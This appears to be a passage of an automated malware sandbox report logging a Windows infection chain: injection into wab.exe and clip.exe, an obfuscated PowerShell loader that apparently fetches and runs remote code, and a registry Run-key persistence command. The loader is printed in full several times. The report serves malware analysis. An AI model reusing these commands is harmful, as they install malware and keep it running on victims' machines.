Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtReadFile: Direct from: 0x76F02ADC Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtQuerySystemInformation: Direct from: 0x1146E7F Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtQuerySystemInformation: Direct from: 0x76F02DFC Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtDelayExecution: Direct from: 0x76F02DDC Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtQueryInformationProcess: Direct from: 0x76F02C26 Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtResumeThread: Direct from: 0x76F02FBC Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtCreateUserProcess: Direct from: 0x76F0371C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe Section loaded: NULL target: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\clip.exe Thread APC queued: target process: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3010000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: CAFAF4 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.% Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)" Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$reglorified = 1;$toupe='s';$toupe+='ubstrin';$toupe+='g';function tyknende($frontotemporal){$kommandodeles=$frontotemporal.length-$reglorified;for($nummerordens=5;$nummerordens -lt $kommandodeles;$nummerordens+=6){$crpe+=$frontotemporal.$toupe.invoke( $nummerordens, $reglorified);}$crpe;}function biblioteksfilerne($kedelcentralen){& ($dataanlgs) ($kedelcentralen);}$udskilles=tyknende 'snuggmfo.oro loo zka.anistoo,lflan lsmaaga len,/ u fi5h.gge.mawse0 xant lint(reae wpaikiitorden stnidsk ftom.gtswgrasssgivin hovs.nas.ertoutbr kvot,1goupi0poess. ook0recr,;tilkn b.arwunderitorrinkalku6rekor4vandm; oldt godkexslamb6anvis4overw;rente taalrrrgssvsvige:ae,li1synan2 rupi1 ukat.,onra0lo.ds)apoth louirgtempee overcgenfokiso.co syst/menis2ioevr0stan.1varsl0 sses0subst1 coex0un af1raias ildnefdo,ediovnhur,etere luk,fareahonobblx ara/ ekvi1kha.e2folk,1b.lls. besk0forme ';$primevally=tyknende '.rsteuhy,osssquibe,parerrewar-tenanafictigaffaee parn jerrt myrt ';$dien=tyknende 'synsmhmilittvajedtdarenps.eep:dob,o/perpl/erase8siren7nonwe. jack1 ,ive2 over1 ar,g.beret1retst0maler5reded..ippe5spare4count/sculpochapoxmec da d,pllbl eduslippr imuli cplma indi2ret t0libet9thick.no,enspostnmjo,dbi.onsu ';$longrun=tyknende 'folke>patte ';$dataanlgs=tyknende ' verdi unree nonvxtppe ';$traditions='nashira';biblioteksfilerne (tyknende 'gregssunassegrmmetpersi-hvalfcpieb.o inv n cinntherdseprve nindtetbrede argum-refitppla tambelptafgrfhklar knivbtc,rva:morte\konomgslutkrs.igey s,agnblahltpne,me stern silkdtalene fejnsmes n.fritit submxbismutcosmo under-rhyptv ext.a ,atol f,inupubliekolla nook $skrivtrubler.orynachancdzonalige.trtc.nidi noncokitnin uds,sorig ;recep ');biblioteksfilerne (tyknende ' repai edelfbasqu diff(hoppetstucce sce,s ivsvtepe.i-.odstpbarriatyroltsysgth ang calcatpatro:rigad\isoclgunordr aggryamputn,hrootbordhe agttn myecdgui ee revesflere.ps,udtplastxpantet prun) snot{d sene vindxleafsikultutsonor} sies;limen ');$kursusoversigten = tyknende 'servoe ontcn gashbi.loounchi preco%vagnuakodiappseu,pse,igdalt.baperu.tinteraspa.l%stuve\dismevcirc.akerattfarvee sprarsleysps.angasha rsgutsesunmeweylvahnsundheafspnsksehu2wiens4 para.besteapatruc .llecmyone resou&parad&t.lip discuedurescbogtihlgel,okilot re.ia$b sni ';biblioteksfilerne (tyknende 'blidh$kitnigtoxollstrbsogeckobs,ffeaaristltrans:tun,ntmephii.ammetde uta.apitrsto.m= i.er(modtac presmindevdafhng henst/tenebcopt.i im,r$hord,k trykufje nr skgls beliusukkesnyoprokomm,vtelesepharmr aritsl mpnianligg rimot tweeeempirndi.yo)majus ');biblioteksfilerne (tyknende 'citat$comp.gend,sl trygoajlefbweddea br,dl haa.:hold fslidsarefusel.ngtraarvad punki st rg,ross=sk.iv$handgdalhusigaulle diaznfradr. oversstephp sheblservaigymnatamtsv(ouvri$alpevlhospiod apen idocgse.ulrsustiu griln spar)ele h ');$dien=$faerdig[0];biblioteksfilerne (tyknende ' girl$ un ega droldredgomortabover,a b.ba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$reglorified = 1;$toupe='s';$toupe+='ubstrin';$toupe+='g';function tyknende($frontotemporal){$kommandodeles=$frontotemporal.length-$reglorified;for($nummerordens=5;$nummerordens -lt $kommandodeles;$nummerordens+=6){$crpe+=$frontotemporal.$toupe.invoke( $nummerordens, $reglorified);}$crpe;}function biblioteksfilerne($kedelcentralen){& ($dataanlgs) ($kedelcentralen);}$udskilles=tyknende 'snuggmfo.oro loo zka.anistoo,lflan lsmaaga len,/ u fi5h.gge.mawse0 xant lint(reae wpaikiitorden stnidsk ftom.gtswgrasssgivin hovs.nas.ertoutbr kvot,1goupi0poess. ook0recr,;tilkn b.arwunderitorrinkalku6rekor4vandm; oldt godkexslamb6anvis4overw;rente taalrrrgssvsvige:ae,li1synan2 rupi1 ukat.,onra0lo.ds)apoth louirgtempee overcgenfokiso.co syst/menis2ioevr0stan.1varsl0 sses0subst1 coex0un af1raias ildnefdo,ediovnhur,etere luk,fareahonobblx ara/ ekvi1kha.e2folk,1b.lls. besk0forme ';$primevally=tyknende '.rsteuhy,osssquibe,parerrewar-tenanafictigaffaee parn jerrt myrt ';$dien=tyknende 'synsmhmilittvajedtdarenps.eep:dob,o/perpl/erase8siren7nonwe. jack1 ,ive2 over1 ar,g.beret1retst0maler5reded..ippe5spare4count/sculpochapoxmec da d,pllbl eduslippr imuli cplma indi2ret t0libet9thick.no,enspostnmjo,dbi.onsu ';$longrun=tyknende 'folke>patte ';$dataanlgs=tyknende ' verdi unree nonvxtppe ';$traditions='nashira';biblioteksfilerne (tyknende 'gregssunassegrmmetpersi-hvalfcpieb.o inv n cinntherdseprve nindtetbrede argum-refitppla tambelptafgrfhklar knivbtc,rva:morte\konomgslutkrs.igey s,agnblahltpne,me stern silkdtalene fejnsmes n.fritit submxbismutcosmo under-rhyptv ext.a ,atol f,inupubliekolla nook $skrivtrubler.orynachancdzonalige.trtc.nidi noncokitnin uds,sorig ;recep ');biblioteksfilerne (tyknende ' repai edelfbasqu diff(hoppetstucce sce,s ivsvtepe.i-.odstpbarriatyroltsysgth ang calcatpatro:rigad\isoclgunordr aggryamputn,hrootbordhe agttn myecdgui ee revesflere.ps,udtplastxpantet prun) snot{d sene vindxleafsikultutsonor} sies;limen ');$kursusoversigten = tyknende 'servoe ontcn gashbi.loounchi preco%vagnuakodiappseu,pse,igdalt.baperu.tinteraspa.l%stuve\dismevcirc.akerattfarvee sprarsleysps.angasha rsgutsesunmeweylvahnsundheafspnsksehu2wiens4 para.besteapatruc .llecmyone resou&parad&t.lip discuedurescbogtihlgel,okilot re.ia$b sni ';biblioteksfilerne (tyknende 'blidh$kitnigtoxollstrbsogeckobs,ffeaaristltrans:tun,ntmephii.ammetde uta.apitrsto.m= i.er(modtac presmindevdafhng henst/tenebcopt.i im,r$hord,k trykufje nr skgls beliusukkesnyoprokomm,vtelesepharmr aritsl mpnianligg rimot tweeeempirndi.yo)majus ');biblioteksfilerne (tyknende 'citat$comp.gend,sl trygoajlefbweddea br,dl haa.:hold fslidsarefusel.ngtraarvad punki st rg,ross=sk.iv$handgdalhusigaulle diaznfradr. oversstephp sheblservaigymnatamtsv(ouvri$alpevlhospiod apen idocgse.ulrsustiu griln spar)ele h ');$dien=$faerdig[0];biblioteksfilerne (tyknende ' girl$ un ega droldredgomortabover,a b.ba
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%tidsperioderne189% -w 1 $yodellers23=(get-itemproperty -path 'hkcu:\lrlingekontrakten\').propertyless;%tidsperioderne189% ($yodellers23)"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$reglorified = 1;$toupe='s';$toupe+='ubstrin';$toupe+='g';function tyknende($frontotemporal){$kommandodeles=$frontotemporal.length-$reglorified;for($nummerordens=5;$nummerordens -lt $kommandodeles;$nummerordens+=6){$crpe+=$frontotemporal.$toupe.invoke( $nummerordens, $reglorified);}$crpe;}function biblioteksfilerne($kedelcentralen){& ($dataanlgs) ($kedelcentralen);}$udskilles=tyknende 'snuggmfo.oro loo zka.anistoo,lflan lsmaaga len,/ u fi5h.gge.mawse0 xant lint(reae wpaikiitorden stnidsk ftom.gtswgrasssgivin hovs.nas.ertoutbr kvot,1goupi0poess. ook0recr,;tilkn b.arwunderitorrinkalku6rekor4vandm; oldt godkexslamb6anvis4overw;rente taalrrrgssvsvige:ae,li1synan2 rupi1 ukat.,onra0lo.ds)apoth louirgtempee overcgenfokiso.co syst/menis2ioevr0stan.1varsl0 sses0subst1 coex0un af1raias ildnefdo,ediovnhur,etere luk,fareahonobblx ara/ ekvi1kha.e2folk,1b.lls. besk0forme ';$primevally=tyknende '.rsteuhy,osssquibe,parerrewar-tenanafictigaffaee parn jerrt myrt ';$dien=tyknende 'synsmhmilittvajedtdarenps.eep:dob,o/perpl/erase8siren7nonwe. jack1 ,ive2 over1 ar,g.beret1retst0maler5reded..ippe5spare4count/sculpochapoxmec da d,pllbl eduslippr imuli cplma indi2ret t0libet9thick.no,enspostnmjo,dbi.onsu ';$longrun=tyknende 'folke>patte ';$dataanlgs=tyknende ' verdi unree nonvxtppe ';$traditions='nashira';biblioteksfilerne (tyknende 'gregssunassegrmmetpersi-hvalfcpieb.o inv n cinntherdseprve nindtetbrede argum-refitppla tambelptafgrfhklar knivbtc,rva:morte\konomgslutkrs.igey s,agnblahltpne,me stern silkdtalene fejnsmes n.fritit submxbismutcosmo under-rhyptv ext.a ,atol f,inupubliekolla nook $skrivtrubler.orynachancdzonalige.trtc.nidi noncokitnin uds,sorig ;recep ');biblioteksfilerne (tyknende ' repai edelfbasqu diff(hoppetstucce sce,s ivsvtepe.i-.odstpbarriatyroltsysgth ang calcatpatro:rigad\isoclgunordr aggryamputn,hrootbordhe agttn myecdgui ee revesflere.ps,udtplastxpantet prun) snot{d sene vindxleafsikultutsonor} sies;limen ');$kursusoversigten = tyknende 'servoe ontcn gashbi.loounchi preco%vagnuakodiappseu,pse,igdalt.baperu.tinteraspa.l%stuve\dismevcirc.akerattfarvee sprarsleysps.angasha rsgutsesunmeweylvahnsundheafspnsksehu2wiens4 para.besteapatruc .llecmyone resou&parad&t.lip discuedurescbogtihlgel,okilot re.ia$b sni ';biblioteksfilerne (tyknende 'blidh$kitnigtoxollstrbsogeckobs,ffeaaristltrans:tun,ntmephii.ammetde uta.apitrsto.m= i.er(modtac presmindevdafhng henst/tenebcopt.i im,r$hord,k trykufje nr skgls beliusukkesnyoprokomm,vtelesepharmr aritsl mpnianligg rimot tweeeempirndi.yo)majus ');biblioteksfilerne (tyknende 'citat$comp.gend,sl trygoajlefbweddea br,dl haa.:hold fslidsarefusel.ngtraarvad punki st rg,ross=sk.iv$handgdalhusigaulle diaznfradr. oversstephp sheblservaigymnatamtsv(ouvri$alpevlhospiod apen idocgse.ulrsustiu griln spar)ele h ');$dien=$faerdig[0];biblioteksfilerne (tyknende ' girl$ un ega droldredgomortabover,a b.ba Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$reglorified = 1;$toupe='s';$toupe+='ubstrin';$toupe+='g';function tyknende($frontotemporal){$kommandodeles=$frontotemporal.length-$reglorified;for($nummerordens=5;$nummerordens -lt $kommandodeles;$nummerordens+=6){$crpe+=$frontotemporal.$toupe.invoke( $nummerordens, $reglorified);}$crpe;}function biblioteksfilerne($kedelcentralen){& ($dataanlgs) ($kedelcentralen);}$udskilles=tyknende 'snuggmfo.oro loo zka.anistoo,lflan lsmaaga len,/ u fi5h.gge.mawse0 xant lint(reae wpaikiitorden stnidsk ftom.gtswgrasssgivin hovs.nas.ertoutbr kvot,1goupi0poess. ook0recr,;tilkn b.arwunderitorrinkalku6rekor4vandm; oldt godkexslamb6anvis4overw;rente taalrrrgssvsvige:ae,li1synan2 rupi1 ukat.,onra0lo.ds)apoth louirgtempee overcgenfokiso.co syst/menis2ioevr0stan.1varsl0 sses0subst1 coex0un af1raias ildnefdo,ediovnhur,etere luk,fareahonobblx ara/ ekvi1kha.e2folk,1b.lls. besk0forme ';$primevally=tyknende '.rsteuhy,osssquibe,parerrewar-tenanafictigaffaee parn jerrt myrt ';$dien=tyknende 'synsmhmilittvajedtdarenps.eep:dob,o/perpl/erase8siren7nonwe. jack1 ,ive2 over1 ar,g.beret1retst0maler5reded..ippe5spare4count/sculpochapoxmec da d,pllbl eduslippr imuli cplma indi2ret t0libet9thick.no,enspostnmjo,dbi.onsu ';$longrun=tyknende 'folke>patte ';$dataanlgs=tyknende ' verdi unree nonvxtppe ';$traditions='nashira';biblioteksfilerne (tyknende 'gregssunassegrmmetpersi-hvalfcpieb.o inv n cinntherdseprve nindtetbrede argum-refitppla tambelptafgrfhklar knivbtc,rva:morte\konomgslutkrs.igey s,agnblahltpne,me stern silkdtalene fejnsmes n.fritit submxbismutcosmo under-rhyptv ext.a ,atol f,inupubliekolla nook $skrivtrubler.orynachancdzonalige.trtc.nidi noncokitnin uds,sorig ;recep ');biblioteksfilerne (tyknende ' repai edelfbasqu diff(hoppetstucce sce,s ivsvtepe.i-.odstpbarriatyroltsysgth ang calcatpatro:rigad\isoclgunordr aggryamputn,hrootbordhe agttn myecdgui ee revesflere.ps,udtplastxpantet prun) snot{d sene vindxleafsikultutsonor} sies;limen ');$kursusoversigten = tyknende 'servoe ontcn gashbi.loounchi preco%vagnuakodiappseu,pse,igdalt.baperu.tinteraspa.l%stuve\dismevcirc.akerattfarvee sprarsleysps.angasha rsgutsesunmeweylvahnsundheafspnsksehu2wiens4 para.besteapatruc .llecmyone resou&parad&t.lip discuedurescbogtihlgel,okilot re.ia$b sni ';biblioteksfilerne (tyknende 'blidh$kitnigtoxollstrbsogeckobs,ffeaaristltrans:tun,ntmephii.ammetde uta.apitrsto.m= i.er(modtac presmindevdafhng henst/tenebcopt.i im,r$hord,k trykufje nr skgls beliusukkesnyoprokomm,vtelesepharmr aritsl mpnianligg rimot tweeeempirndi.yo)majus ');biblioteksfilerne (tyknende 'citat$comp.gend,sl trygoajlefbweddea br,dl haa.:hold fslidsarefusel.ngtraarvad punki st rg,ross=sk.iv$handgdalhusigaulle diaznfradr. oversstephp sheblservaigymnatamtsv(ouvri$alpevlhospiod apen idocgse.ulrsustiu griln spar)ele h ');$dien=$faerdig[0];biblioteksfilerne (tyknende ' girl$ un ega droldredgomortabover,a b.ba Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%tidsperioderne189% -w 1 $yodellers23=(get-itemproperty -path 'hkcu:\lrlingekontrakten\').propertyless;%tidsperioderne189% ($yodellers23)" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
